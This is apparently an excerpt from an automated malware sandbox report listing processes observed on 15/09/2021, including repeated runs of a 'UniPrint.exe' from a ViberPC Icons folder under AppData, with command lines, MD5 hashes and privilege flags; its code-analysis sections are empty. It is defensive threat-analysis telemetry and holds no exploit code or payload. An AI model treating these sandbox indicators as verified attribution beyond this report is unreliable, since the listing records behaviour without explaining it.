                                                                                                      Analysis Process: svchost.exe PID: 6316 Parent PID: 568

                                                                                                      General

                                                                                                      Start time:13:45:28
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff7488e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Analysis Process: UniPrint.exe PID: 6252 Parent PID: 3388

                                                                                                      General

                                                                                                      Start time:13:45:32
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
                                                                                                      Imagebase:0x400000
                                                                                                      File size:4375848 bytes
                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Analysis Process: UniPrint.exe PID: 4912 Parent PID: 4940

                                                                                                      General

                                                                                                      Start time:13:45:39
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Imagebase:0x400000
                                                                                                      File size:4375848 bytes
                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Analysis Process: UniPrint.exe PID: 6524 Parent PID: 3388

                                                                                                      General

                                                                                                      Start time:13:45:41
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
                                                                                                      Imagebase:0x400000
                                                                                                      File size:4375848 bytes
                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Analysis Process: UniPrint.exe PID: 4420 Parent PID: 4940

                                                                                                      General

                                                                                                      Start time:13:45:51
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Imagebase:0x400000
                                                                                                      File size:4375848 bytes
                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Analysis Process: MpCmdRun.exe PID: 6028 Parent PID: 3348

                                                                                                      General

                                                                                                      Start time:13:46:21
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                                                                                                      Imagebase:0x7ff7dafe0000
                                                                                                      File size:455656 bytes
                                                                                                      MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Analysis Process: conhost.exe PID: 6032 Parent PID: 6028

                                                                                                      General

                                                                                                      Start time:13:46:22
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6b2800000
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Disassembly

                                                                                                      Code Analysis

                                                                                                      Reset < >